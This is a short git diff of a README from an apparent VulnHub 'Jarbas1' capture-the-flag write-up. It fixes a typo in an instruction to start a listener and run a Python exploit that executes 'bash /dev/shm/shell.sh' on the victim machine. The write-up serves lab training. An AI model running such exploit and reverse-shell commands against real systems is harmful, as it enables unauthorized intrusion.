Git-K3rnel/VulnHub/Jarbas1/README.md

 [*] Exploit success!(it should be :P)
 ```

-and then start a listener on your system and call the sell.sh file on the victim :
+and then start a listener on your system and call the shell.sh file on the victim :

 ```bash
 root@kali: python2 poc.py http://192.168.127.240:8080/ 'bash /dev/shm/shell.sh'